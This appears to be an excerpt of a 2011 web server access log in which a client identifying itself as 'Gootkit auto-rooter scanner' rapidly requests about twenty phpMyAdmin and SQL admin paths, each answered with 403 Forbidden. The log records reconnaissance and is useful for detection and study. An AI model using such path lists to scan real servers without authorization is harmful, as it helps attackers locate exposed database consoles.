 [21/Sep/2011:09:28:32 -0400] "GET /sql/myadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:32 -0400] "GET /sql/phpmanager/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:32 -0400] "GET /sql/php-myadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:33 -0400] "GET /sql/phpmy-admin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:33 -0400] "GET /sql/phpMyAdmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:33 -0400] "GET /sql/phpmyadmin2/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:33 -0400] "GET /sql/phpMyAdmin2/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:33 -0400] "GET /sql/sql/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:33 -0400] "GET /sql/sql-admin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:34 -0400] "GET /sql/sqladmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:34 -0400] "GET /sql/sqlweb/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:34 -0400] "GET /sqlweb/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:34 -0400] "GET /sql/webadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:34 -0400] "GET /sql/webdb/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:35 -0400] "GET /sql/websql/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:35 -0400] "GET /typo3/phpmyadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:35 -0400] "GET /web/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:35 -0400] "GET /webadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:35 -0400] "GET /webdb/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:35 -0400] "GET /web/phpMyAdmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:36 -0400] "GET /websql/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"